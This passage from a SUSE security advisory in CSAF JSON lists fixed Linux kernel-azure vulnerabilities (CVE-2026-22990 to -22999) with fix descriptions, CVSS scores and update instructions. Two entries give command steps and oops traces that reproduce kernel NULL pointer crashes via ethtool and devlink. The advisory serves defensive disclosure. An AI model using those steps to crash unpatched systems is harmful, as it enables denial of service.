"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
